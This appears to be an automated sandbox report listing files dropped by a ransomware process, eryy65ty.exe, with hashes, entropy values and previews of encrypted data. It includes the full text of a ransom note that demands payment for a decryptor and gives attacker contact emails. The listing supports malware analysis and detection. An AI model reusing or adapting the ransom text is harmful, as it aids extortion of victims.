                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..jtZ..n<O_.H.g."m.^.j..n....tP*..Pk.O...Z+..l...a.j. .A.,...Y.|...O.$.u..J|....P.......3..h2..X..P....:....R]...b..g4......o.;".....F}..P.5+.1U..(...}.X..'...{%...9D...v...R.LW.<.\..Hs.....J3....v..)..A.......7.F[...b.P;..%...-.S...h..........q........`-*..6.%..r.$.t....F..P.{.dZ|..f).e!.R....._.:....e.^..#Oe....].+.>..|...KK........E.K\..a9o.B."=.t.a..p".K.......*.s.}.cm1O$%\.P^..j.3!..6.X~..[...+1..w.....Z._@.U.f.Ud.3..ub......(..s".."l.o..G........$a7.x4.`......3k....w4..; y.....whP...."k.<......2F6..5.`.J..a{..x.h........m.0)jXLR.uZ..........-O.Y.'.~lL}.`:XR.>.Duc.A..<.....6.O.p......V.^..z....o.g..h.d..>...j.E.j...8qr2....0."6... .q'Y4.....Fw._.......S.d.q.....a...vcX4..V.....>&l...i....`c.WL 6...).<..Mq..8j.....|\f0X{...8.....N.Z/s....c...i...)....H...5...7]_Q....aPp.`.C)..f.,]./.?.....i.>..<&........xY...Hm.....^e..L..3.o5y.n.0.......i.*.;.....#.Q.%.>.Q:...7....NJ\../..z...|q.0....fm._..z.6y32........|.~"....x..j.n..1Z....v...#eIY.]..(.PZ~...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.846542467910161
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:qwMmm7L39qIdJ/F0KzbDkVPHdYKooBR4iRo+HlviusqR:qwM1f9jzo99HlvT
                                                                                                                                            MD5:64F7A9B35654CDA729634FCCDCE7CF03
                                                                                                                                            SHA1:087801002AC1AA4D9BBCA7FDA543A5DC38043B77
                                                                                                                                            SHA-256:17A6B6497432A6A020F3E69E2A27BB75791DE16ED6D522AA6DC0EBDD324FBDD0
                                                                                                                                            SHA-512:DD867D76A0C31357463EBA4AE7279EBFA5E640E7766DC34746E49F9DB70BD8AFE81E9CB5FCE5FF9D24730453C82D0791D31871693047BD345AA623EF20DAD4E3
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..jtZ..n<O_.H.g."m.^.j..n....tP*..Pk.O...Z+..l...a.j. .A.,...Y.|...O.$.u..J|....P.......3..h2..X..P....:....R]...b..g4......o.;".....F}..P.5+.1U..(...}.X..'...{%...9D...v...R.LW.<.\..Hs.....J3....v..)..A.......7.F[...b.P;..%...-.S...h..........q........`-*..6.%..r.$.t....F..P.{.dZ|..f).e!.R....._.:....e.^..#Oe....].+.>..|...KK........E.K\..a9o.B."=.t.a..p".K.......*.s.}.cm1O$%\.P^..j.3!..6.X~..[...+1..w.....Z._@.U.f.Ud.3..ub......(..s".."l.o..G........$a7.x4.`......3k....w4..; y.....whP...."k.<......2F6..5.`.J..a{..x.h........m.0)jXLR.uZ..........-O.Y.'.~lL}.`:XR.>.Duc.A..<.....6.O.p......V.^..z....o.g..h.d..>...j.E.j...8qr2....0."6... .q'Y4.....Fw._.......S.d.q.....a...vcX4..V.....>&l...i....`c.WL 6...).<..Mq..8j.....|\f0X{...8.....N.Z/s....c...i...)....H...5...7]_Q....aPp.`.C)..f.,]./.?.....i.>..<&........xY...Hm.....^e..L..3.o5y.n.0.......i.*.;.....#.Q.%.>.Q:...7....NJ\../..z...|q.0....fm._..z.6y32........|.~"....x..j.n..1Z....v...#eIY.]..(.PZ~...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.847360165800697
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:c3ifbv7NhP1+7GVyOiMFfzxb1Le+KebtZ5aPivx1vR:cWw6kOnRLe+KIZ5lvx
                                                                                                                                            MD5:C1EE0C98348B0CF457D1DDDDFCF422F6
                                                                                                                                            SHA1:FF340C8248902FC98DD91711F595BAC42FAC43AA
                                                                                                                                            SHA-256:9A1AFAC351F4876C6DB470CB96A95A124279FC569FCE765BB281A605DA5B96F4
                                                                                                                                            SHA-512:A52605511192518C2CDFBE738DE62BC7DEB90C4BFDB2248FF7DE9513D5CA691CB6BC3B2BE284B0B3939C4B50FB93F8CF31841CEFE0B93225CF44E603A7E5CEA0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.L .....n..x.......W......x.H.......d.+G+.g|B.c...&.....6.'s65..XS.>...u.:K.O.3.....9.>HeV..r,+i..7....'.....)q.tg..2...l..]..!....421..T.n..0adY...G..[...2...D.C.-.....^^9&6..Su3.o.p.5./.t..):.Q....Y>].....(5.9..i.b'C.j.]..U\.V...._.SJ..sZ........k..?U..F.}B|M)...eC$-....v.]..<Gq.L..mK.......K`....G\.QCi......%.......q.........i..auK....M.k..^.+L.q...;7.9...*..<.'.0..<...y.V8...I......Pr0.%..Wc?7~.C.........h.&;......I8..o.?20.9>....br....n.?{.B. K.4`..;..2...2.|h....c...YV*.=......S..+K..R%..,}.k....<......q...{..x..a1..h.s.,.E.=...%H...5M?b...\b.Zz..SuQi........{...X<..z...d.....?..x.^K...^s`.,.&.......n.j.=.$.r...Wh...X<..\.."..=..}..:......W..$-{..NM...I...}......o...y+O..+.z.k......j.%.I...O$R'7....-r.hN...3.....mgx..X;".7..KU}.q.eoO.>.YD/..!E.1....v....U..%%8.].w..v^..>-.s.......m.p'a.."(C.....&a.t.....O.F...\...5\...;.....].............a8.Z(>.dC...[L..7NI.(]O.o.....(...E.U:.g..Y..|.l.d.S.>SO...kC8l1*...'.l...s.v.10&:~...VE.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.847360165800697
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:c3ifbv7NhP1+7GVyOiMFfzxb1Le+KebtZ5aPivx1vR:cWw6kOnRLe+KIZ5lvx
                                                                                                                                            MD5:C1EE0C98348B0CF457D1DDDDFCF422F6
                                                                                                                                            SHA1:FF340C8248902FC98DD91711F595BAC42FAC43AA
                                                                                                                                            SHA-256:9A1AFAC351F4876C6DB470CB96A95A124279FC569FCE765BB281A605DA5B96F4
                                                                                                                                            SHA-512:A52605511192518C2CDFBE738DE62BC7DEB90C4BFDB2248FF7DE9513D5CA691CB6BC3B2BE284B0B3939C4B50FB93F8CF31841CEFE0B93225CF44E603A7E5CEA0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.L .....n..x.......W......x.H.......d.+G+.g|B.c...&.....6.'s65..XS.>...u.:K.O.3.....9.>HeV..r,+i..7....'.....)q.tg..2...l..]..!....421..T.n..0adY...G..[...2...D.C.-.....^^9&6..Su3.o.p.5./.t..):.Q....Y>].....(5.9..i.b'C.j.]..U\.V...._.SJ..sZ........k..?U..F.}B|M)...eC$-....v.]..<Gq.L..mK.......K`....G\.QCi......%.......q.........i..auK....M.k..^.+L.q...;7.9...*..<.'.0..<...y.V8...I......Pr0.%..Wc?7~.C.........h.&;......I8..o.?20.9>....br....n.?{.B. K.4`..;..2...2.|h....c...YV*.=......S..+K..R%..,}.k....<......q...{..x..a1..h.s.,.E.=...%H...5M?b...\b.Zz..SuQi........{...X<..z...d.....?..x.^K...^s`.,.&.......n.j.=.$.r...Wh...X<..\.."..=..}..:......W..$-{..NM...I...}......o...y+O..+.z.k......j.%.I...O$R'7....-r.hN...3.....mgx..X;".7..KU}.q.eoO.>.YD/..!E.1....v....U..%%8.].w..v^..>-.s.......m.p'a.."(C.....&a.t.....O.F...\...5\...;.....].............a8.Z(>.dC...[L..7NI.(]O.o.....(...E.U:.g..Y..|.l.d.S.>SO...kC8l1*...'.l...s.v.10&:~...VE.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:zlib compressed data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.83723424668658
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:+ZN3LyDAsmzzWnkAhNMBmfkVPm5YMQch/uE9+PuNfhVY6zRxZBEQDfJQ5QThS:IBLRHWkAhCjdHsuE9+P0sMxZmAoAhS
                                                                                                                                            MD5:334926AA7A0CE0DF63C16DCD4F37B9EE
                                                                                                                                            SHA1:A1247BE024ACCBC54D651B2F593853876469D7E6
                                                                                                                                            SHA-256:2BF77D89C6910A342278C034087D41C60F004B69130A3BFF27414129429370D2
                                                                                                                                            SHA-512:DF804A9078924D4D788E12AF5558CF79C0A5EAD7EB6C4870E48FDD34D0ED7D8D0FC9D2ED6FE73FD438340074FDB644067A8D68197644996AE856CC405A0C8B70
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:X.`n..j...*...`^l.57......-...K;YG.Hn......y.........B....x.%....'~9M......f....LQh.U...N.@^.uZ.......b...Ld.....i...$+...&...c..O..1'aI}.cX...^.b...|..b..4.a....8..M......?.....0_.(..Y.GrI.5......y.8.u.$......%...Y..L...Pd.d.d.........<.......}.......@...:.:..._x.[.<.bc..8.T|.y.Q.......].)............`..3>/g...n...q.H.....q4.X..'.LD.A..9.+:...E....................:.\...0O..xe....;.>x..C..5..Z.\)0....8..~.J.?....km.$..~...4..FL.Iu.F...s;.._q.^Q.5.(.R}WG......F.K..........i.WTJ.O.".LY.V.H.I..]s. ......+~AXc.T.....x.aw....B.~@.M...|.kt.iTC.?uv^.x...=c.Yn..o.......`%.o{..S'.Ud..&".g...;)Zy%m.6...c.....r...y<k.A.,..uZj.!5..%.x3Y1.(......`#MST/...cn.n.!....s. ...yY$.....{;.I...~.)..N;S..C.m...(.pL...C..)....-7.^....y.93f.I[...'V'2|.L...#.....G_.Fl-.u.....Eu.\&....Sgja#.P"..Q.4KH.L.?@.!<K!.A..k.`Q..~.4W.f.di.~.........'.1...x.E1N.5.$....O..."...(.(..Q.=..Kg*Y.:5.2....D..........xdr..F.d20.|#.?A2........h...[...b..wV9...)b*.4a...n..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:zlib compressed data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.83723424668658
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:+ZN3LyDAsmzzWnkAhNMBmfkVPm5YMQch/uE9+PuNfhVY6zRxZBEQDfJQ5QThS:IBLRHWkAhCjdHsuE9+P0sMxZmAoAhS
                                                                                                                                            MD5:334926AA7A0CE0DF63C16DCD4F37B9EE
                                                                                                                                            SHA1:A1247BE024ACCBC54D651B2F593853876469D7E6
                                                                                                                                            SHA-256:2BF77D89C6910A342278C034087D41C60F004B69130A3BFF27414129429370D2
                                                                                                                                            SHA-512:DF804A9078924D4D788E12AF5558CF79C0A5EAD7EB6C4870E48FDD34D0ED7D8D0FC9D2ED6FE73FD438340074FDB644067A8D68197644996AE856CC405A0C8B70
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:X.`n..j...*...`^l.57......-...K;YG.Hn......y.........B....x.%....'~9M......f....LQh.U...N.@^.uZ.......b...Ld.....i...$+...&...c..O..1'aI}.cX...^.b...|..b..4.a....8..M......?.....0_.(..Y.GrI.5......y.8.u.$......%...Y..L...Pd.d.d.........<.......}.......@...:.:..._x.[.<.bc..8.T|.y.Q.......].)............`..3>/g...n...q.H.....q4.X..'.LD.A..9.+:...E....................:.\...0O..xe....;.>x..C..5..Z.\)0....8..~.J.?....km.$..~...4..FL.Iu.F...s;.._q.^Q.5.(.R}WG......F.K..........i.WTJ.O.".LY.V.H.I..]s. ......+~AXc.T.....x.aw....B.~@.M...|.kt.iTC.?uv^.x...=c.Yn..o.......`%.o{..S'.Ud..&".g...;)Zy%m.6...c.....r...y<k.A.,..uZj.!5..%.x3Y1.(......`#MST/...cn.n.!....s. ...yY$.....{;.I...~.)..N;S..C.m...(.pL...C..)....-7.^....y.93f.I[...'V'2|.L...#.....G_.Fl-.u.....Eu.\&....Sgja#.P"..Q.4KH.L.?@.!<K!.A..k.`Q..~.4W.f.di.~.........'.1...x.E1N.5.$....O..."...(.(..Q.=..Kg*Y.:5.2....D..........xdr..F.d20.|#.?A2........h...[...b..wV9...)b*.4a...n..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.834593096400218
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:srwBbUOH8QlSnbRfUhOj5YkCeW1frBOK2luUN21dA8RrBJ0RS:DBNSntcoVBCdRBOKsnN21ykrD0RS
                                                                                                                                            MD5:E4EC1EFB0EE6F01EEF82194DF5BDC47F
                                                                                                                                            SHA1:4F64274A128FD233AF1709BF04750D0621C158C5
                                                                                                                                            SHA-256:E19D89CE27FB17E563DAFDF416A29087042D32945A102816AADB4869FA6F9E60
                                                                                                                                            SHA-512:C06E8E7049BC04B2798E76C64B0B9894D9839877C67892D42D321A87D08BBC653F2A10E7033D67720A3C9056CD40EA30C2816C35133A3A0D3553EEE002F43783
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:....g.....k.....k..V#..g.FX..e$.R..-X........6.fbnTb...%:jMv@..u..K....(.U$x.u.e...4*.<......+.9A...4.5..\.M..'j.e.U.Im.....M-}`.,tWp8..2mu.V..-nG.>.d..Y"..{.cSo..hS..q5........:9......W...h..;.*..f........b7.....e...M..e.mu.D.\..,4...)t;.....B.........~4w5.'._.......%{.F..Q?llW.~.V.E!._./.SM.n.,......;p.J.;.R. ...{..."..D....GH.M.T9I6.t~...U1.|...oQ..z.....0.....CH.D.k...Z..8.e..S%.v...F. EHs.HH.5...6....b.c....B.{.e......z.....+.. .U.r...5P..?..X.04..q.8.yU.....):...s.p.[A....~T..U.%...^.O...5...4.>.>..V......7.?..WR....Yp)C)j.W..-.Cn<...S.....`....[....V..o.'|.bY..V.@B.r/>..M....F.....V.3(."..067.1.Gp>...v.Q.n..7.c....A.WF....f..Y..6u.<)+....h..o/.%...P.H..?Tr.x1..G...........Lb10.7.VU>.5....{._.]i.S++f....k?...v$C~..e..n.U...:..a..r=u.to...U.....F..?.-...Z.[}a.....S9....D..?.b....lA.lg..m*.,...?.R./...+...m<..8.....F....?...>_'..\3.........f...._.U...K.O.V.d:'...d.=..#./.B1..J#l..Q.?..h...+...6.[2....y...!.X...%.q...Z
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.834593096400218
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:srwBbUOH8QlSnbRfUhOj5YkCeW1frBOK2luUN21dA8RrBJ0RS:DBNSntcoVBCdRBOKsnN21ykrD0RS
                                                                                                                                            MD5:E4EC1EFB0EE6F01EEF82194DF5BDC47F
                                                                                                                                            SHA1:4F64274A128FD233AF1709BF04750D0621C158C5
                                                                                                                                            SHA-256:E19D89CE27FB17E563DAFDF416A29087042D32945A102816AADB4869FA6F9E60
                                                                                                                                            SHA-512:C06E8E7049BC04B2798E76C64B0B9894D9839877C67892D42D321A87D08BBC653F2A10E7033D67720A3C9056CD40EA30C2816C35133A3A0D3553EEE002F43783
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:....g.....k.....k..V#..g.FX..e$.R..-X........6.fbnTb...%:jMv@..u..K....(.U$x.u.e...4*.<......+.9A...4.5..\.M..'j.e.U.Im.....M-}`.,tWp8..2mu.V..-nG.>.d..Y"..{.cSo..hS..q5........:9......W...h..;.*..f........b7.....e...M..e.mu.D.\..,4...)t;.....B.........~4w5.'._.......%{.F..Q?llW.~.V.E!._./.SM.n.,......;p.J.;.R. ...{..."..D....GH.M.T9I6.t~...U1.|...oQ..z.....0.....CH.D.k...Z..8.e..S%.v...F. EHs.HH.5...6....b.c....B.{.e......z.....+.. .U.r...5P..?..X.04..q.8.yU.....):...s.p.[A....~T..U.%...^.O...5...4.>.>..V......7.?..WR....Yp)C)j.W..-.Cn<...S.....`....[....V..o.'|.bY..V.@B.r/>..M....F.....V.3(."..067.1.Gp>...v.Q.n..7.c....A.WF....f..Y..6u.<)+....h..o/.%...P.H..?Tr.x1..G...........Lb10.7.VU>.5....{._.]i.S++f....k?...v$C~..e..n.U...:..a..r=u.to...U.....F..?.-...Z.[}a.....S9....D..?.b....lA.lg..m*.,...?.R./...+...m<..8.....F....?...>_'..\3.........f...._.U...K.O.V.d:'...d.=..#./.B1..J#l..Q.?..h...+...6.[2....y...!.X...%.q...Z
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.845307903712835
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:jX4/2AsqNNLcfW+Dy/MUhoYIUEbbOB2rVy0oVuHvOc:j4Bs4gUE2B2z8uPF
                                                                                                                                            MD5:DF57EAB853EB3D13E8BE55C044B1CD13
                                                                                                                                            SHA1:241BAD3C74587F4849DFC3EC54636177B892B77E
                                                                                                                                            SHA-256:92C3CC418119BF2D62EF7070A8C092B5088D867F565F2C964A825836E4F10B8C
                                                                                                                                            SHA-512:345EC76543E479A4893B77E3D51552F8AA33428ECE359E7EF8448D4BCC0714CBF5330A5C4F0966C8B90926D944C9D1AD74F403D3D6A0E7238DA39894C08AD21C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:N...;A........C...V.gSK:...t.A..+..........d.Y.......J..4.<K2..x%>,..O.a.`.Fe...qfXhc..V........C.(.....Z.b.)]..3.b....^..:.59{]@.....T.eMt.].....^6...u7..UKp+....q^...d.2...uW.....7.......K....o.O.E..l.\..g`..D.e>.|^[..#..2.g.DN...U.A...p...w[..o.O...B#&S..>el.p...6...sL....J.%."..Y.|./...m..=.;u.W@.VJ....4=3.0N.8L...6.+*.|.kA.p.xF[.smDI.-._.Y........5....,.h.g.~...7.bX.9J....c...i.;i....;K.e...&F..s....*.....M./..~.......V.h.&+..R.S^...w.=*...@:.....j.......o.)+.3...3.F....Z}..7.T...L]g...~..Z.~)y..g~.O.......5..........d:.OH..2.....qcc....,;5.RO.....mI\..&M...4.. .}pD..p..P6.......O.2...|...t.,...T2..)..ts8.EH.~..F..._.....././..w...O.]?_...S&8Y....M..0.^Hl...4..._..,Pd.d.".....s.L=.../.{.bb...h.w..JWW..3*..j.O.Y..R8...S_2...4...oS.,.C..3..?.U.@i.h?..A..;..|/!`..Y.... ...p...x.6,..v......I....p.G....<{...-.....=(...=...Q. .2....m.4.$....V..>.3.Op.......B..@X.s..(.) =....|..q.'.C......).y&d.....i@.&f.s.../..o.......Q"I.f."..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.845307903712835
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:jX4/2AsqNNLcfW+Dy/MUhoYIUEbbOB2rVy0oVuHvOc:j4Bs4gUE2B2z8uPF
                                                                                                                                            MD5:DF57EAB853EB3D13E8BE55C044B1CD13
                                                                                                                                            SHA1:241BAD3C74587F4849DFC3EC54636177B892B77E
                                                                                                                                            SHA-256:92C3CC418119BF2D62EF7070A8C092B5088D867F565F2C964A825836E4F10B8C
                                                                                                                                            SHA-512:345EC76543E479A4893B77E3D51552F8AA33428ECE359E7EF8448D4BCC0714CBF5330A5C4F0966C8B90926D944C9D1AD74F403D3D6A0E7238DA39894C08AD21C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:N...;A........C...V.gSK:...t.A..+..........d.Y.......J..4.<K2..x%>,..O.a.`.Fe...qfXhc..V........C.(.....Z.b.)]..3.b....^..:.59{]@.....T.eMt.].....^6...u7..UKp+....q^...d.2...uW.....7.......K....o.O.E..l.\..g`..D.e>.|^[..#..2.g.DN...U.A...p...w[..o.O...B#&S..>el.p...6...sL....J.%."..Y.|./...m..=.;u.W@.VJ....4=3.0N.8L...6.+*.|.kA.p.xF[.smDI.-._.Y........5....,.h.g.~...7.bX.9J....c...i.;i....;K.e...&F..s....*.....M./..~.......V.h.&+..R.S^...w.=*...@:.....j.......o.)+.3...3.F....Z}..7.T...L]g...~..Z.~)y..g~.O.......5..........d:.OH..2.....qcc....,;5.RO.....mI\..&M...4.. .}pD..p..P6.......O.2...|...t.,...T2..)..ts8.EH.~..F..._.....././..w...O.]?_...S&8Y....M..0.^Hl...4..._..,Pd.d.".....s.L=.../.{.bb...h.w..JWW..3*..j.O.Y..R8...S_2...4...oS.,.C..3..?.U.@i.h?..A..;..|/!`..Y.... ...p...x.6,..v......I....p.G....<{...-.....=(...=...Q. .2....m.4.$....V..>.3.Op.......B..@X.s..(.) =....|..q.'.C......).y&d.....i@.&f.s.../..o.......Q"I.f."..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.861298705663249
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:8s1HEG7uFLtQriVGkBCKwZijzPbn4oNwq8/neztzAKOZVajrgijUb7I0V9HlIgJm:8sGGui+VGCCKwZijzDVNwq8/ezBh9/si
                                                                                                                                            MD5:BE5644C5A798A6E6A89FB64B42AE6652
                                                                                                                                            SHA1:7A34EDB9796CCB6201660113EE41C8D208FFEB6F
                                                                                                                                            SHA-256:700AF9E20C636E3F18D41D667D476B56DCBFA37C06D1A70F9B9F2FA10E742BB0
                                                                                                                                            SHA-512:F919BC97389401059087C24235B38C44424B1E27D0190202230E85AFE80CFB679CA90FDCA83E06ABD5D8E4DC6B9D4621D68828A5169B0A10A4E187A5525C9569
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.*....J..`V(."D.pc Z.G.....mh...(.sn...q..nh.3S......g3'.....w.A.I..G...Ep.....q...|...-....D.v2".....S.z.Ob...r._>Zm....eO..T.....@.....XzX..........]V....w;8.P}...r.|...O/..O.......Ck.d..K..#.N.#.J.;.H...R..|g.....V..U......d..'G.iX..,................E.......<7a..V+.5..R....."CG.X.,y.wF.#v...].{...*...`a.9n....7.5t....L..fe..f....h.......... ...X...pe..7.....`.X.F.F..........%Chu.4.Ley..}i60.%.R-D.U16..m>.....=H.W.&2.,?...f...A=..h+$....K ...F.....9./.T+m.~....9...(]6...o...%96....)..h%....%.H.#D\AB..A.].9=..5j.s1....e{.8r...a|F...DlJ..V.J.C.Z].N.2K@g.+>!.F.1..s.....b:y~......:z>.At.-.....(.M.S....s~..'J.].R./..?M..a...F.........f..-..K....!3.......X-..x.u..N.'xY...Od.y.&.2.@...6...%kz.F...>V^..p..x>.e.....'tb..4...5K..lQ.Z.......h.d...u...,...x.....o...........1S/..f......ix...:..n.~".w'_..yI.B....k*.8K.9d.zL.d......mE@.`..h..:...;`~.S\.(\.r.W..s.5..........;5..r.$....45%...............x+uY...J.Y...:y./.B.v.B=..S/.H%._Q.IU. .L....WVO.>.I...#.Y
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.861298705663249
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:8s1HEG7uFLtQriVGkBCKwZijzPbn4oNwq8/neztzAKOZVajrgijUb7I0V9HlIgJm:8sGGui+VGCCKwZijzDVNwq8/ezBh9/si
                                                                                                                                            MD5:BE5644C5A798A6E6A89FB64B42AE6652
                                                                                                                                            SHA1:7A34EDB9796CCB6201660113EE41C8D208FFEB6F
                                                                                                                                            SHA-256:700AF9E20C636E3F18D41D667D476B56DCBFA37C06D1A70F9B9F2FA10E742BB0
                                                                                                                                            SHA-512:F919BC97389401059087C24235B38C44424B1E27D0190202230E85AFE80CFB679CA90FDCA83E06ABD5D8E4DC6B9D4621D68828A5169B0A10A4E187A5525C9569
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.*....J..`V(."D.pc Z.G.....mh...(.sn...q..nh.3S......g3'.....w.A.I..G...Ep.....q...|...-....D.v2".....S.z.Ob...r._>Zm....eO..T.....@.....XzX..........]V....w;8.P}...r.|...O/..O.......Ck.d..K..#.N.#.J.;.H...R..|g.....V..U......d..'G.iX..,................E.......<7a..V+.5..R....."CG.X.,y.wF.#v...].{...*...`a.9n....7.5t....L..fe..f....h.......... ...X...pe..7.....`.X.F.F..........%Chu.4.Ley..}i60.%.R-D.U16..m>.....=H.W.&2.,?...f...A=..h+$....K ...F.....9./.T+m.~....9...(]6...o...%96....)..h%....%.H.#D\AB..A.].9=..5j.s1....e{.8r...a|F...DlJ..V.J.C.Z].N.2K@g.+>!.F.1..s.....b:y~......:z>.At.-.....(.M.S....s~..'J.].R./..?M..a...F.........f..-..K....!3.......X-..x.u..N.'xY...Od.y.&.2.@...6...%kz.F...>V^..p..x>.e.....'tb..4...5K..lQ.Z.......h.d...u...,...x.....o...........1S/..f......ix...:..n.~".w'_..yI.B....k*.8K.9d.zL.d......mE@.`..h..:...;`~.S\.(\.r.W..s.5..........;5..r.$....45%...............x+uY...J.Y...:y./.B.v.B=..S/.H%._Q.IU. .L....WVO.>.I...#.Y
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
